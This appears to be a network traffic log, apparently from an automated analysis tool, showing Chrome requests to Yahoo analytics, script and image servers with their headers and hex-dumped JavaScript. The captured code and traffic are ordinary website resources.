                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC837OUTGET /tag/opus.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: opus.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 18528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Security-Policy: default-src https:; script-src https: 'unsafe-inline'; style-src https: 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "36fe94e917e5dc731081ce2ed65a7ca7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 24 Sep 2024 14:03:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ECAcc (lhd/35B2)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: sDMl5O9qRe/pFa7sG2l9UZPHBVY+CHaa3a/wLgS74yolY5jL3ZHjFaotzw8AaVxVQTqhp/1/PVs=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 2TBSD3PS1WWSJ0ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC8487INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 6d 61 74 63 68 28 2f 5b 5c 77 5d 2b 5c 2e 28 5b 5c 77 5d 2b 7c 63 6f 2e 75 6b 29 24 2f 29 5b 30 5d 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 22 22 7d 7d 3b 63 6f 6e 73 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 3d 22 29 2c 6f 3d 28 74 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 61 3d 30 3b 61 3c 6f 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){va


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              137192.168.2.45116187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC541OUTGET /aaq/c/553e048.caas-news_web.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: zk7GH2ETpcf3uz0PNL/8v1SMogpd8HKw1s74Hqbg3W9S5KktLsuGWrQm30cQx8PZcHD6SeZbBGI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: Z5Z098GA79VDWWV5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 11:08:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 04 Oct 2024 09:21:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "6351528876ada81ca05adcfc0bc8ef9d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: jaV3JWhWt7fUeZ8LEuQzkpdlwU7NiUCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 122423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 374716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 43 41 41 53 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 43 41 41 53 3d 74 28 29 3a 65 2e 43 41 41 53 3d 74 28 29 7d 28 73 65 6c 66 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 73 2c 6f 2c 61 3d 7b 22 2e 2f 6e 6f 64 65 5f 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("CAAS",[],t):"object"==typeof exports?exports.CAAS=t():e.CAAS=t()}(self,(function(){return function(){var e,t,s,o,a={"./node_m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 2e 73 65 6c 65 63 74 6f 72 29 3b 66 6f 72 28 6c 65 74 20 6f 3d 73 2e 6c 65 6e 67 74 68 3b 6f 2d 2d 3b 74 2e 75 6e 73 68 69 66 74 28 73 5b 6f 5d 29 29 3b 72 65 74 75 72 6e 20 74 2e 66 69 6c 74 65 72 28 28 74 3d 3e 21 28 30 2c 6f 2e 68 61 73 43 6c 61 73 73 29 28 74 2c 65 2e 73 75 63 63 65 73 73 43 6c 61 73 73 29 29 29 7d 28 65 2e 6f 70 74 69 6f 6e 73 29 2c 74 2e 63 6f 75 6e 74 3d 74 2e 65 6c 65 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 2e 64 65 73 74 72 6f 79 65 64 29 7b 63 6f 6e 73 74 7b 61 64 64 54 6f 75 63 68 4d 6f 76 65 4c 69 73 74 65 6e 65 72 3a 73 2c 63 6f 6e 74 61 69 6e 65 72 3a 61 7d 3d 65 2e 6f 70 74 69 6f 6e 73 3b 74 2e 64 65 73 74 72 6f 79 65 64 3d 21 31 2c 61 26 26 28 30 2c 6f 2e 65 61 63 68 29 28 61 2c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: SelectorAll(e.selector);for(let o=s.length;o--;t.unshift(s[o]));return t.filter((t=>!(0,o.hasClass)(t,e.successClass)))}(e.options),t.count=t.elements.length,t.destroyed){const{addTouchMoveListener:s,container:a}=e.options;t.destroyed=!1,a&&(0,o.each)(a,(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 65 26 26 28 30 2c 6f 2e 67 65 74 41 74 74 72 29 28 65 2c 22 64 61 74 61 2d 64 61 72 6b 2d 73 72 63 22 29 7c 7c 28 30 2c 6f 2e 67 65 74 41 74 74 72 29 28 65 2c 6c 29 7c 7c 28 30 2c 6f 2e 67 65 74 41 74 74 72 29 28 65 2c 73 2e 73 72 63 29 3b 69 66 28 74 29 7b 63 6f 6e 73 74 20 61 3d 74 2e 73 70 6c 69 74 28 73 2e 73 65 70 61 72 61 74 6f 72 29 2c 69 3d 61 5b 6e 26 26 61 2e 6c 65 6e 67 74 68 3e 31 3f 31 3a 30 5d 2c 6c 3d 28 30 2c 6f 2e 67 65 74 41 74 74 72 29 28 65 2c 73 2e 73 72 63 73 65 74 29 2c 63 3d 72 28 65 2c 22 69 6d 67 22 29 2c 6d 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 68 3d 6d 26 26 72 28 6d 2c 22 70 69 63 74 75 72 65 22 29 3b 69 66 28 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 2e 73 72 63 29 7b 6c 65 74 20 74 3d 64 3f 65 3a 6e 65 77 20 49 6d 61 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e&&(0,o.getAttr)(e,"data-dark-src")||(0,o.getAttr)(e,l)||(0,o.getAttr)(e,s.src);if(t){const a=t.split(s.separator),i=a[n&&a.length>1?1:0],l=(0,o.getAttr)(e,s.srcset),c=r(e,"img"),m=e.parentNode,h=m&&r(m,"picture");if(c||void 0===e.src){let t=d?e:new Image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 2c 73 2e 64 65 73 74 72 6f 79 65 64 3d 21 30 2c 74 2e 6f 70 74 69 6f 6e 73 3d 65 7c 7c 7b 7d 2c 74 2e 6f 70 74 69 6f 6e 73 2e 61 64 64 54 6f 75 63 68 4d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 74 2e 6f 70 74 69 6f 6e 73 2e 61 64 64 54 6f 75 63 68 4d 6f 76 65 4c 69 73 74 65 6e 65 72 7c 7c 21 31 2c 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 21 21 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 43 6c 61 73 73 26 26 74 2e 6f 70 74 69 6f 6e 73 2e 72 6f 6f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 2e 24 7b 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 43 6c 61 73 73 7d 60 29 2c 74 2e 6f 70 74 69 6f 6e 73 2e 65 72 72 6f 72 3d 74 2e 6f 70 74 69 6f 6e 73 2e 65 72 72 6f 72 7c 7c 21 31 2c 74 2e 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,s.destroyed=!0,t.options=e||{},t.options.addTouchMoveListener=t.options.addTouchMoveListener||!1,t.options.container=!!t.options.containerClass&&t.options.root.querySelectorAll(`.${t.options.containerClass}`),t.options.error=t.options.error||!1,t.options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6f 76 65 4c 69 73 74 65 6e 65 72 3a 65 2c 70 65 6e 64 69 6e 67 43 6c 61 73 73 3a 61 7d 3d 74 2e 6f 70 74 69 6f 6e 73 3b 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 26 26 28 30 2c 6f 2e 65 61 63 68 29 28 74 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 2c 28 65 3d 3e 7b 28 30 2c 6f 2e 75 6e 62 69 6e 64 45 76 65 6e 74 29 28 65 2c 22 73 63 72 6f 6c 6c 22 2c 73 2e 76 61 6c 69 64 61 74 65 44 29 7d 29 29 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 73 2e 63 6f 75 6e 74 3b 74 2b 2b 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 65 6c 65 6d 65 6e 74 73 5b 74 5d 3b 28 30 2c 6f 2e 72 65 6d 6f 76 65 43 6c 61 73 73 29 28 65 2c 61 29 7d 28 30 2c 6f 2e 75 6e 62 69 6e 64 45 76 65 6e 74 29 28 77 69 6e 64 6f 77 2c 22 73 63 72 6f 6c 6c 22 2c 73 2e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oveListener:e,pendingClass:a}=t.options;t.options.container&&(0,o.each)(t.options.container,(e=>{(0,o.unbindEvent)(e,"scroll",s.validateD)}));for(let t=0;t<s.count;t++){const e=s.elements[t];(0,o.removeClass)(e,a)}(0,o.unbindEvent)(window,"scroll",s.valid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 75 65 3a 21 30 7d 29 2c 74 2e 76 69 73 69 62 69 6c 69 74 79 4d 65 74 61 3d 74 2e 75 6e 62 69 6e 64 45 76 65 6e 74 3d 74 2e 74 68 72 6f 74 74 6c 65 3d 74 2e 73 65 74 41 74 74 72 73 3d 74 2e 73 65 74 41 74 74 72 3d 74 2e 72 65 73 75 6d 65 49 66 72 61 6d 65 3d 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 3d 74 2e 72 65 6d 6f 76 65 41 74 74 72 3d 74 2e 72 65 61 64 79 3d 74 2e 70 61 72 73 65 55 72 6c 3d 74 2e 6c 6f 61 64 53 63 72 69 70 74 53 79 6e 63 3d 74 2e 6c 6f 61 64 43 53 53 53 79 6e 63 3d 74 2e 6c 61 7a 79 4c 6f 61 64 4f 6e 63 65 4f 6e 6c 79 3d 74 2e 69 73 4e 6f 64 65 4e 61 6d 65 3d 74 2e 68 61 73 43 6c 61 73 73 3d 74 2e 68 61 6e 64 6c 65 53 6f 75 72 63 65 73 3d 74 2e 68 61 6e 64 6c 65 53 6f 75 72 63 65 3d 74 2e 67 65 74 51 75 65 72 79 53 74 72 69 6e 67 3d 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ue:!0}),t.visibilityMeta=t.unbindEvent=t.throttle=t.setAttrs=t.setAttr=t.resumeIframe=t.removeClass=t.removeAttr=t.ready=t.parseUrl=t.loadScriptSync=t.loadCSSSync=t.lazyLoadOnceOnly=t.isNodeName=t.hasClass=t.handleSources=t.handleSource=t.getQueryString=t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 73 3d 64 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 74 29 29 2c 73 7d 3b 74 2e 74 68 72 6f 74 74 6c 65 3d 28 65 2c 74 2c 73 29 3d 3e 7b 6c 65 74 20 6f 3d 30 3b 72 65 74 75 72 6e 28 2e 2e 2e 61 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 2b 6e 65 77 20 44 61 74 65 3b 69 2d 6f 3c 74 7c 7c 28 6f 3d 69 2c 65 2e 61 70 70 6c 79 28 73 2c 61 29 29 7d 7d 3b 74 2e 64 65 62 6f 75 6e 63 65 3d 28 65 2c 74 2c 73 29 3d 3e 7b 6c 65 74 20 6f 3b 72 65 74 75 72 6e 28 2e 2e 2e 61 29 3d 3e 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6f 29 2c 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .getComputedStyle&&(s=document.defaultView.getComputedStyle(e,null).getPropertyValue(t)),s};t.throttle=(e,t,s)=>{let o=0;return(...a)=>{const i=+new Date;i-o<t||(o=i,e.apply(s,a))}};t.debounce=(e,t,s)=>{let o;return(...a)=>{clearTimeout(o),o=setTimeout(((
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 65 61 64 79 53 74 61 74 65 3f 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 63 61 70 74 75 72 65 3a 21 31 2c 70 61 73 73 69 76 65 3a 21 30 7d 29 3a 65 28 29 7d 3b 63 6f 6e 73 74 20 68 3d 28 65 2c 74 3d 28 28 29 3d 3e 7b 7d 29 2c 73 2c 6f 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 61 3d 30 29 3d 3e 7b 69 66 28 73 26 26 64 28 77 69 6e 64 6f 77 2c 73 2e 73 70 6c 69 74 28 22 2e 22 29 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 74 28 29 3b 63 6f 6e 73 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 2e 73 72 63 3d 65 2c 69 2e 74 79 70 65 3d 6f 2c 69 2e 61 73 79 6e 63 3d 21 30 2c 69 2e 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eadyState?document.addEventListener("DOMContentLoaded",e,{capture:!1,passive:!0}):e()};const h=(e,t=(()=>{}),s,o="text/javascript",a=0)=>{if(s&&d(window,s.split(".")))return void t();const i=document.createElement("script");i.src=e,i.type=o,i.async=!0,i.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 74 20 73 3d 30 3b 69 66 28 74 29 69 66 28 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 29 74 72 79 7b 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 65 29 7c 7c 28 73 3d 22 62 63 6e 5f 75 6e 73 75 63 63 65 73 73 66 75 6c 22 29 7d 63 61 74 63 68 28 6f 29 7b 73 3d 22 62 63 6e 5f 65 72 72 6f 72 22 7d 65 6c 73 65 20 73 3d 22 62 63 6e 5f 75 6e 73 75 70 70 6f 72 74 65 64 22 3b 65 6c 73 65 20 73 3d 22 62 63 6e 5f 75 73 65 69 6d 67 22 3b 69 66 28 73 29 7b 65 3d 65 2b 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f 22 3f 22 3a 22 26 22 29 2b 28 6e 65 77 20 44 61 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t s=0;if(t)if(window.navigator&&"function"==typeof window.navigator.sendBeacon)try{window.navigator.sendBeacon(e)||(s="bcn_unsuccessful")}catch(o){s="bcn_error"}else s="bcn_unsupported";else s="bcn_useimg";if(s){e=e+(-1===e.indexOf("?")?"?":"&")+(new Date
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 20 73 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 6d 6f 7a 48 69 64 64 65 6e 21 3d 3d 73 3f 28 74 3d 22 6d 6f 7a 48 69 64 64 65 6e 22 2c 65 3d 22 6d 6f 7a 22 2b 65 29 3a 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 6d 73 48 69 64 64 65 6e 21 3d 3d 73 3f 28 74 3d 22 6d 73 48 69 64 64 65 6e 22 2c 65 3d 22 6d 73 22 2b 65 29 3a 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 77 65 62 6b 69 74 48 69 64 64 65 6e 21 3d 3d 73 26 26 28 74 3d 22 77 65 62 6b 69 74 48 69 64 64 65 6e 22 2c 65 3d 22 77 65 62 6b 69 74 22 2b 65 29 2c 7b 68 69 64 64 65 6e 3a 74 2c 76 69 73 69 62 69 6c 69 74 79 43 68 61 6e 67 65 3a 65 7d 7d 29 28 29 7d 2c 22 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 40 76 7a 6d 69 2f 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s="undefined";return typeof document.mozHidden!==s?(t="mozHidden",e="moz"+e):typeof document.msHidden!==s?(t="msHidden",e="ms"+e):typeof document.webkitHidden!==s&&(t="webkitHidden",e="webkit"+e),{hidden:t,visibilityChange:e}})()},"./node_modules/@vzmi/w


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              138192.168.2.45116787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC763OUTGET /uu/api/res/1.2/uUAR2bOq_t6VJz1nT5AULg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_sports_articles_558/4a196f0fdaa67a9fca3ea52c340239cd.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1112INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 10928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="4a196f0fdaa67a9fca3ea52c340239cd.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "06e0c3ec10d958937f87b3172c3f56dd"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 14:30:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T14:42:01.592Z;desc=hit,rtt;dur=87,content-info;desc="width=536,height=284,bytes=10928,owidth=8001,oheight=5334,obytes=4393962,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
